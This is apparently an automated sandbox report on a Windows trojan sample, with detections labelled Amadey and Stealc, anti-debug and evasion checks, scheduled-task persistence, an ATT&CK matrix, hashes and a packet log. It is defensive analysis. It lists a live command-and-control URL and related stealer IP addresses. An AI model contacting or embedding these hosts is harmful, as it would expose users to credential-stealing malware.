                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SICE
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SIWVID
                    Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
                    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04CD0306 rdtsc 0_2_04CD0306
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_0092645B mov eax, dword ptr fs:[00000030h] 6_2_0092645B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_0092A1C2 mov eax, dword ptr fs:[00000030h] 6_2_0092A1C2
                    Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                    Source: axplong.exe, axplong.exe, 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: cProgram Manager
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_0090D312 cpuid 6_2_0090D312
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_0090CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 6_2_0090CB1A

                    Stealing of Sensitive Information

                    Source: Yara match File source: 0.2.file.exe.cf0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 6.2.axplong.exe.8f0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 3.2.axplong.exe.8f0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 2.2.axplong.exe.8f0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000000.00000002.2190425127.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.2220852652.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000003.2149476998.0000000004AE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000002.00000003.2179442160.0000000005020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000003.2180250631.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000002.00000002.2220557064.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match File source: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match File source: 00000006.00000003.2651739897.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 Scheduled Task/Job | 12 Process Injection | 1 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                    Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 251 Virtualization/Sandbox Evasion | LSASS Memory | 741 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 12 Process Injection | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 3 Obfuscated Files or Information | NTDS | 251 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 11 Application Layer Protocol | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 224 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    [Behavior graph] ID: 1520475, Sample: file.exe, Start date: 27/09/2024, Architecture: WINDOWS, Score: 100

                    Source | Detection | Scanner | Label | Link
                    file.exe | 55% | ReversingLabs | Win32.Packed.Themida |
                    file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                    file.exe | 100% | Joe Sandbox ML | |
                    Source | Detection | Scanner | Label | Link
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | 55% | ReversingLabs | Win32.Trojan.Generic |
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    No contacted domains info
                    Name | Malicious | Antivirus Detection | Reputation
                    http://185.215.113.16/Jo89Ku7d/index.php | true | | unknown
                                                                IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                                185.215.113.16 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
                                                                Joe Sandbox version: 41.0.0 Charoite
                                                                Analysis ID: 1520475
                                                                Start date and time: 2024-09-27 11:28:18 +02:00
                                                                Joe Sandbox product: CloudBasic
                                                                Overall analysis duration: 0h 6m 8s
                                                                Hypervisor based Inspection enabled: false
                                                                Report type: full
                                                                Cookbook file name: default.jbs
                                                                Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed: 8
                                                                Number of new started drivers analysed: 0
                                                                Number of existing processes analysed: 0
                                                                Number of existing drivers analysed: 0
                                                                Number of injected processes analysed: 0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode: default
                                                                Analysis stop reason: Timeout
                                                                Sample name: file.exe
                                                                Detection: MAL
                                                                Classification: mal100.troj.spyw.evad.winEXE@5/3@0/1
                                                                EGA Information:
                                                                • Successful, ratio: 25%
                                                                HCA Information: Failed
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, 7.4.8.4.4.3.1.4.0.0.0.0.0.0.0.0.0.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target axplong.exe, PID 2996 because there are no executed function
                                                                • Execution Graph export aborted for target axplong.exe, PID 3784 because there are no executed function
                                                                • Execution Graph export aborted for target file.exe, PID 5748 because it is empty
                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • VT rate limit hit for: file.exe
                                                                Time | Type | Description
                                                                05:30:01 | API Interceptor | 694361x Sleep call for process: axplong.exe modified
                                                                11:29:12 | Task Scheduler | Run new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                                185.215.113.16 | 8y4qT1eVpi.exe | malicious | Amadey, Stealc | 185.215.113.16/soka/random.exe
                                                                185.215.113.16 | file.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
                                                                185.215.113.16 | file.exe | malicious | LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz | 185.215.113.16/Jo89Ku7d/index.php
                                                                No context
Match: WHOLESALECONNECTIONSNL
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | Stealc | 185.215.113.37
8y4qT1eVpi.exe | malicious | Amadey, Stealc | 185.215.113.103
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | Amadey | 185.215.113.16
file.exe | malicious | Stealc, Vidar | 185.215.113.37
file.exe | malicious | Amadey | 185.215.113.16
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | Amadey | 185.215.113.16
file.exe | malicious | Stealc, Vidar | 185.215.113.37
file.exe | malicious | Amadey | 185.215.113.16
                                                                No context
Match: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Associated Sample Name / URL | Detection | Threat Name
8y4qT1eVpi.exe | malicious | Amadey, Stealc
                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1923072
                                                                  Entropy (8bit):7.94989797306349
                                                                  Encrypted:false
                                                                  SSDEEP:49152:yndcjiRsr7EcYYIpTdp08efz7c2QL7nqIGg0HlpI4:eZR66TdWfXc2aTDYI
                                                                  MD5:73ACB4CC181ACA9525AB9F599500B9CA
                                                                  SHA1:46A29F8B0E10003F85A8EAE8A46473D0344650DF
                                                                  SHA-256:4BC8AB389044AABD25719E924300530FEDDAE8EFA8A485CBFD67DE8F347132F2
                                                                  SHA-512:F84E777E3591E00A8C7AC53AD47554D100AEC16F19E143DD69447CD2D3872975C5C673F2AB1A8C66A164D0DEC73D8876A7D9064386EB90C0474E55C2187CE5C0
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 55%
                                                                  Joe Sandbox View:
                                                                  • Filename: 8y4qT1eVpi.exe, Detection: malicious, Browse
                                                                  Reputation:low
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................L...........@...........................L...........@.................................W...k............................kL..............................kL..................................................... . ............................@....rsrc...............................@....idata ............................@... ..+.........................@...dmbsosmk.@...02..>..................@...uuntaxqq.....pL......2..............@....taggant.0....L.."...6..............@...........................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:modified
                                                                  Size (bytes):26
                                                                  Entropy (8bit):3.95006375643621
                                                                  Encrypted:false
                                                                  SSDEEP:3:ggPYV:rPYV
                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                  Malicious:true
                                                                  Reputation:high, very likely benign file
                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):304
                                                                  Entropy (8bit):3.449259938803551
                                                                  Encrypted:false
                                                                  SSDEEP:6:AMERvmVXlXUEZ+lX1lOJUPelkDdtE9+AQy0lbXdt0:AMERI1Q1lOmeeDs9+nVLdt0
                                                                  MD5:FC29F7659967AE584FCD3DF81A7A6873
                                                                  SHA1:D099B0CB02EAFBF0CECFA13D320CA43DFEFC4037
                                                                  SHA-256:59DFDA5FB6236BF51139515F7AAD7CA195E4CD2F98DE6678A0B4E71C17ECEE78
                                                                  SHA-512:AEE956F795938358C3B9EEFED53B4B0AC591486CE33FBBB20C9A10DD86F02A884CDE557729EA2C6355089479F2D7D86A6CEBD7A5B1A09DB0BE41588FA2695395
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:....6.l.v.GJ.[KJ..*.F.......<... .....s.......... ....................<.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0...................@3P.........................
                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.94989797306349
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:file.exe
                                                                  File size:1'923'072 bytes
                                                                  MD5:73acb4cc181aca9525ab9f599500b9ca
                                                                  SHA1:46a29f8b0e10003f85a8eae8a46473d0344650df
                                                                  SHA256:4bc8ab389044aabd25719e924300530feddae8efa8a485cbfd67de8f347132f2
                                                                  SHA512:f84e777e3591e00a8c7ac53ad47554d100aec16f19e143dd69447cd2d3872975c5c673f2ab1a8c66a164d0dec73d8876a7d9064386eb90c0474e55c2187ce5c0
                                                                  SSDEEP:49152:yndcjiRsr7EcYYIpTdp08efz7c2QL7nqIGg0HlpI4:eZR66TdWfXc2aTDYI
                                                                  TLSH:2C9533676AA1FA45C0592C3D02C611F7EFF43D250F6CAC7B444F50B648AB6AAF399C90
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................
                                                                  Icon Hash:00928e8e8686b000
                                                                  Entrypoint:0x8c8000
                                                                  Entrypoint Section:.taggant
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:6
                                                                  OS Version Minor:0
                                                                  File Version Major:6
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:6
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                  Instruction
                                                                  jmp 00007FD4A50EF64Ah
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6a057 | 0x6b | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x69000 | 0x1e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x4c6bd8 | 0x10 | dmbsosmk
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x4c6b88 | 0x18 | dmbsosmk
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(blank) | 0x1000 | 0x68000 | 0x2de00 | 6d50196f7b5ae45824a431eef5b50658 | False | 0.9974561478201635 | data | 7.986034970037844 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x69000 | 0x1e0 | 0x200 | 91486163663a4305e32eeb4121f91443 | False | 0.576171875 | data | 4.499495391799583 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x6a000 | 0x1000 | 0x200 | cc76e3822efdc911f469a3e3cc9ce9fe | False | 0.1484375 | data | 1.0428145631430756 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(blank) | 0x6b000 | 0x2b8000 | 0x200 | 8ea2baa4e0e7f3136a9485542b7cad93 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
dmbsosmk | 0x323000 | 0x1a4000 | 0x1a3e00 | 75cae3cf00182da978937b697cd3d82f | False | 0.99479069756624 | data | 7.954774902073578 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
uuntaxqq | 0x4c7000 | 0x1000 | 0x400 | faf67af2e8789c3ff16ef1f42d4bd344 | False | 0.70703125 | data | 5.671834197687797 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x4c8000 | 0x3000 | 0x2200 | 96775bf0feb34cf91c61367962b0c166 | False | 0.05859375 | DOS executable (COM) | 0.7821275486501513 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x4c6be8 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
DLL | Import
kernel32.dll | lstrcpy
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-27T11:30:14.455258+0200 | 2856147 | ETPRO MALWARE Amadey CnC Activity M3 | 1 | 192.168.2.6 | 65069 | 185.215.113.16 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                  Sep 27, 2024 11:30:13.421866894 CEST6506880192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:13.426786900 CEST8065068185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:13.653191090 CEST8065068185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:13.653260946 CEST6506880192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:13.757915020 CEST6506880192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:13.758399963 CEST6506980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:13.763221979 CEST8065068185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:13.763258934 CEST8065069185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:13.763271093 CEST6506880192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:13.763323069 CEST6506980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:13.763535976 CEST6506980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:13.768455982 CEST8065069185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:14.455089092 CEST8065069185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:14.455257893 CEST6506980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:14.455976963 CEST6506980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:14.460891962 CEST8065069185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:14.678169012 CEST8065069185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:14.678235054 CEST6506980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:14.788621902 CEST6506980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:14.788957119 CEST6507080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:14.793823004 CEST8065069185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:14.793893099 CEST6506980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:14.794028997 CEST8065070185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:14.794099092 CEST6507080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:14.794277906 CEST6507080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:14.799405098 CEST8065070185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:15.485001087 CEST8065070185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:15.485172987 CEST6507080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:15.485976934 CEST6507080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:15.490729094 CEST8065070185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:15.707859039 CEST8065070185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:15.708034039 CEST6507080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:15.819920063 CEST6507080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:15.820233107 CEST6507180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:15.825268030 CEST8065071185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:15.825406075 CEST6507180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:15.825481892 CEST6507180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:15.825512886 CEST8065070185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:15.825568914 CEST6507080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:15.830478907 CEST8065071185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:16.532732010 CEST8065071185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:16.532840014 CEST6507180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:16.533512115 CEST6507180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:16.538548946 CEST8065071185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:16.764434099 CEST8065071185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:16.764692068 CEST6507180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:16.866693020 CEST6507180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:16.867010117 CEST6507280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:16.871900082 CEST8065072185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:16.871978998 CEST6507280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:16.872104883 CEST6507280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:16.872498035 CEST8065071185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:16.872548103 CEST6507180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:16.876873016 CEST8065072185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:17.579579115 CEST8065072185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:17.579756021 CEST6507280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:17.580671072 CEST6507280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:17.585505962 CEST8065072185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:17.816270113 CEST8065072185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:17.816406012 CEST6507280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:17.929208040 CEST6507280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:17.929541111 CEST6507380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:17.934442997 CEST8065073185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:17.934456110 CEST8065072185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:17.934587002 CEST6507280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:17.934628010 CEST6507380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:17.934891939 CEST6507380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:17.939714909 CEST8065073185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:19.731122971 CEST8065073185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:19.731178999 CEST6507380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:19.731821060 CEST8065073185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:19.731920958 CEST6507380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:19.731959105 CEST6507380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:19.731976032 CEST8065073185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:19.732014894 CEST6507380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:19.733408928 CEST8065073185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:19.733458996 CEST6507380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:19.736846924 CEST8065073185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:19.964298010 CEST8065073185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:19.964477062 CEST6507380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:20.069888115 CEST6507380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:20.070218086 CEST6507480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:20.075017929 CEST8065074185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:20.075113058 CEST6507480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:20.075190067 CEST8065073185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:20.075238943 CEST6507380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:20.075298071 CEST6507480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:20.080051899 CEST8065074185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:20.784742117 CEST8065074185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:20.784929991 CEST6507480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:20.786175966 CEST6507480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:20.790916920 CEST8065074185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:21.025149107 CEST8065074185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:21.025230885 CEST6507480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:21.132282972 CEST6507480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:21.132643938 CEST6507580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:21.137573004 CEST8065075185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:21.137696028 CEST6507580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:21.137820005 CEST6507580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:21.138099909 CEST8065074185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:21.138149977 CEST6507480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:21.142714977 CEST8065075185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:21.838718891 CEST8065075185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:21.838854074 CEST6507580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:21.841479063 CEST6507580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:21.846415997 CEST8065075185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:22.065246105 CEST8065075185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:22.065417051 CEST6507580192.168.2.6185.215.113.16
